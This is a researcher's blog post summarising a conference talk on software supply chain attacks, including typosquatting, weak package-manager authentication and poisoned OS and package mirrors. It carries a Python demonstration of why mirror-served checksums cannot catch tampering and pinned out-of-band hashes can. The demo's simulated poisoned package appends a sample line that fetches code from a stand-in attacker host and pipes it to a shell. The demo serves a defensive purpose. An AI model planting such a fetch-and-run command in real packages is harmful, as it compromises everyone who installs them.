I recently presented Supply Chainsaw: Practical software supply chain attacks for everyone at the OPCDE technical security conference in Dubai.
In between pictures of Sharknadoes and memes was an array of software supply chain attacks:
- We proved most programming language package managers have major security weaknesses
- Typosquatting and wrong-command attacks compromise users who mistype a package name or install command
- Anonymous automatic registration and publishing make attacks easy
- Weak authentication: no two-factor, and sometimes no authentication at all
- Developers of popular open-source packages and their powerful credentials are exposed to many different attacks through the development process and permanent credential caching
- Operating system package managers are manually reviewed and harder to poison
- But nearly every OS is acquired insecurely and is unlikely to be verified by the user, from Linux to Mac OS to Windows
- MITM attacks proven practical against proxy/VPN/Tor users - over 5,000 potential opportunities to poison executable downloads in my test
- We became OS and package mirrors to prove:
  - Anyone could infect packages and OSs delivered via a mirror
  - It can be quick, cheap, anonymous, and have worldwide effect
- Packages often are not verified against anything external
- We were never denied anything we asked for
- We are running honest mirrors, but we have no guarantee others are trustworthy or have not been compromised
- Anywhere from hundreds to millions of users can be compromised using these techniques
- Supply chain attacks are happening in the wild now
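As an added illustration (not code from the talk or the slides), the Python below models the trust problem behind the mirror points above: a download mirror serves both the package and the checksum file that sits beside it, so a checksum fetched from the same mirror proves nothing, while a hash pinned from a source the mirror does not control catches the substitution. The package bytes, the injected payload, and the two mirror classes are constructed for this example.

```python
import hashlib
import hmac

# Constructed sample: the artifact the upstream project actually published.
UPSTREAM_PACKAGE = b"#!/bin/sh\necho 'installing widget 1.2.3'\n"

# A hash obtained out of band (the project's own TLS site, a signed release
# note, a reviewed lockfile). For the demo it is computed from the genuine bytes;
# in practice it is copied from somewhere the mirror operator cannot edit.
PINNED_SHA256 = hashlib.sha256(UPSTREAM_PACKAGE).hexdigest()


class Mirror:
    """A download mirror serving a package and the checksum file next to it (constructed)."""

    def __init__(self, package: bytes):
        self._package = package

    def fetch_package(self) -> bytes:
        return self._package

    def fetch_checksum(self) -> str:
        # The checksum file is generated from whatever the mirror serves, so a
        # poisoned mirror publishes a checksum that matches the poisoned bytes.
        return hashlib.sha256(self._package).hexdigest()


class PoisonedMirror(Mirror):
    """Same interface, but the operator has appended a payload to the package (constructed)."""

    def __init__(self, package: bytes, payload: bytes):
        super().__init__(package + payload)


def verify_in_band(mirror: Mirror) -> bool:
    """Naive check: compare the download against the checksum served by the same mirror."""
    data = mirror.fetch_package()
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), mirror.fetch_checksum())


def verify_pinned(mirror: Mirror, pinned_sha256: str) -> bool:
    """Check the download against a hash obtained from a source the mirror does not control."""
    data = mirror.fetch_package()
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), pinned_sha256)


def run_demo() -> dict:
    """Run both checks against an honest mirror and a poisoned one; return the outcomes."""
    honest = Mirror(UPSTREAM_PACKAGE)
    # Constructed payload; the hostname is reserved and does not resolve.
    poisoned = PoisonedMirror(UPSTREAM_PACKAGE, b"curl http://attacker.invalid/x | sh\n")
    return {
        "honest_in_band": verify_in_band(honest),
        "honest_pinned": verify_pinned(honest, PINNED_SHA256),
        # Passes: the mirror controls both the package and its checksum file.
        "poisoned_in_band": verify_in_band(poisoned),
        # Fails: the pinned hash was obtained outside the mirror's control.
        "poisoned_pinned": verify_pinned(poisoned, PINNED_SHA256),
    }


if __name__ == "__main__":
    for check, passed in run_demo().items():
        print(f"{check}: {'OK' if passed else 'MISMATCH'}")
```

The same reasoning applies to an OS ISO: a `SHA256SUMS` file fetched from the mirror that served the image only tells you the mirror is self-consistent. A hash or detached signature obtained from the vendor over a separate channel, with the signing key itself fetched out of band, is what makes the check meaningful.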
You can download the presentation here: Supply Chainsaw, or you can view it on SlideShare (although you'll miss out on the slides with animations) here:
Supply Chainsaw